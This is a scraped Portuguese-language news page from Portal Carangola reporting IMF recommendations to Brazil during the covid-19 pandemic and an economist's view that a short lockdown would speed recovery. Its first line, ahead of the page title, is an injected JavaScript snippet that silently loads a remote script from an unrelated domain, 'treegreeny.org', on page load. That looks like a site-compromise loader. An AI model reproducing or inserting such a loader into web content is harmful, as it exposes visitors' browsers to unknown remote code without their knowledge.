;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lockdown curto ajudaria na retomada da economia brasileira, afirma analista. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Lockdown curto ajudaria na retomada da economia brasileira, afirma analista.

O Fundo Monetário Internacional (FMI) fez recomendações ao Brasil na quarta-feira (7) salientando que o país deve manter o apoio à economia durante a pandemia de covid-19, mas sem desrespeitar o teto de gastos.

A recomendação foi feita pelo diretor do Departamento de Assuntos Fiscais do FMI, Vitor Gaspar. No documento, o órgão calculou que a dívida pública bruta do Brasil alcançará 98,4% do Produto Interno Bruto (PIB) em 2021.
Para o economista Josilmar Cordenonssi, professor da Universidade Presbiteriana Mackenzie, as declarações do FMI não mostram “nenhum conflito entre economia e saúde ou entre salvar vidas e salvar a economia”.

“O fato de nós termos uma falta de coordenação ao combater a covid-19 e o espalhamento das contaminações faz com que a economia demore mais para ter a sua retomada. A gente está evitando tomar um certo remédio amargo, de fazer um lockdown mais curto, para a economia voltar mais rapidamente”, disse à agência de notícias Sputnik Brasil.

O FMI afirmou que os programas implementados em 2020, como o auxílio emergencial, foram bem-sucedidos em apoiar os mais vulneráveis e a atividade econômica. Vitor Gaspar destacou que essas políticas devem ser mantidas e adaptadas para as condições do país enquanto durar a pandemia.
Josilmar Cordenonssi concorda com as afirmações do diretor do FMI e diz que as políticas serviram para “sustentar a economia”.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.